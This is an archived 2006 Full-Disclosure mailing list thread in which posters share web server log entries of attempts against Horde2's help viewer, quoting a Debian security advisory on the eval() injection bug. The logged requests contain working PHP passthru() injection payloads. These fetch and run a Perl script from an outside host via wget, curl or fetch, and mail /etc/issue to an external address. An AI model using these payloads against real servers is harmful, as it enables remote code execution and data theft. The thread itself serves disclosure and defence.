lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <1145027688.17039.43.camel@Stargate.iatechconsulting.com>
Date: Fri Apr 14 16:07:04 2006
From: nodialtone at comcast.net (Byron Copeland)
Subject: [SECURITY] [DSA 1034-1] New horde2 packages
	fixseveral vulnerabilities

Here's another attempt:

GET /horde//services/help/?show=about&module=;%22
.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).
%22dary.6te.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22dary.6te.net%
22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22dary.6te.net%22.chr(47).%22h;perl%20h
;rm%20-rf%20h*%22);'. HTTP/1.1" 404 77 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows 98)"

:)


On Fri, 2006-04-14 at 10:49, <...> wrote:
> <from [funsec]>
> (thx Henderson, Dennis K.)
> 
> Which web server would be a target for this GET?
> 
> Not sure what group to post this to but I'm sure having fun watching the
> attempts..
> 
> :)
> 
> 
> 
> 
> GET
> /horde2/services/help/?show=about&module=;%22.passthru(%22cat%20%22.chr(
> 47).%22etc%22.chr(47).%22issue%20%7Cmail%20-s%20ho2%20p0wd3r31337@...il.
> com%22);'. HTTP/1.1
> Accept: */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
> Host: x.x.x.x
> Connection: Close
> 
> </from [funsec]>
> 
> ----- Original Message ----- 
> From: "Moritz Muehlenhoff" <jmm@...ian.org>
> To: <debian-security-announce@...ts.debian.org>
> Sent: Friday, April 14, 2006 4:42 PM
> Subject: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages 
> fixseveral vulnerabilities
> 
> 
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > - --------------------------------------------------------------------------
> > Debian Security Advisory DSA 1034-1                    security@...ian.org
> > http://www.debian.org/security/                         Moritz Muehlenhoff
> > April 14th, 2006                        http://www.debian.org/security/faq
> > - --------------------------------------------------------------------------
> >
> > Package        : horde2
> > Vulnerability  : several
> > Problem-Type   : remote
> > Debian-specific: no
> > CVE ID         : CVE-2006-1260 CVE-2006-1491
> >
> > Several remote vulnerabilities have been discovered in the Horde web
> > application framework, which may lead to the execution of arbitrary
> > web script code. The Common Vulnerabilities and Exposures project
> > identifies the following problems:
> >
> > CVE-2006-1260
> >
> >    Null characters in the URL parameter bypass a sanity check, which
> >    allowed remote attackers to read arbitrary files, which allowed
> >    information disclosure.
> >
> > CVE-2006-1491
> >
> >    User input in the help viewer was passed unsanitised to the eval()
> >    function, which allowed injection of arbitrary web code.
> >
> >
> > The old stable distribution (woody) doesn't contain horde2 packages.
> >
> > For the stable distribution (sarge) these problems have been fixed in
> > version 2.2.8-1sarge2.
> >
> > The unstable distribution (sid) does no longer contain horde2 packages.
> >
> > We recommend that you upgrade your horde2 package.
> >
> >
> > Upgrade Instructions
> > - --------------------
> >
> > wget url
> >        will fetch the file for you
> > dpkg -i file.deb
> >        will install the referenced file.
> >
> > If you are using the apt-get package manager, use the line for
> > sources.list as given below:
> >
> > apt-get update
> >        will update the internal database
> > apt-get upgrade
> >        will install corrected packages
> >
> > You may use an automated update by adding the resources from the
> > footer to the proper configuration.
> >
> >
> > Debian GNU/Linux 3.1 alias sarge
> > - --------------------------------
> >
> >  Source archives:
> >
> > 
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.dsc
> >      Size/MD5 checksum:      575 acf3f1924f04e2faddfd06ba9b01820e
> > 
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.diff.gz
> >      Size/MD5 checksum:    39504 fb338c016b70e69fa4b867fa116b86dc
> > 
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8.orig.tar.gz
> >      Size/MD5 checksum:   683005 89961af4e4488a908147d7b3a0dc3b44
> >
> >  Architecture independent components:
> >
> > 
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2_all.deb
> >      Size/MD5 checksum:   721398 35fa1bf8bf8b4f2be1076501b984367a
> >
> >
> >  These files will probably be moved into the stable distribution on
> >  its next update.
> >
> > - ---------------------------------------------------------------------------------
> > For apt-get: deb http://security.debian.org/ stable/updates main
> > For dpkg-ftp: ftp://security.debian.org/debian-security
> > dists/stable/updates/main
> > Mailing list: debian-security-announce@...ts.debian.org
> > Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.3 (GNU/Linux)
> >
> > iD8DBQFEP7SJXm3vHE4uyloRAsVVAJ4n9UoO57tJYCw1JePujnjy90XFvACg3DLn
> > nrfwvObZjSThW+pXcD8NI38=
> > =BIdm
> > -----END PGP SIGNATURE-----
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> > 
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ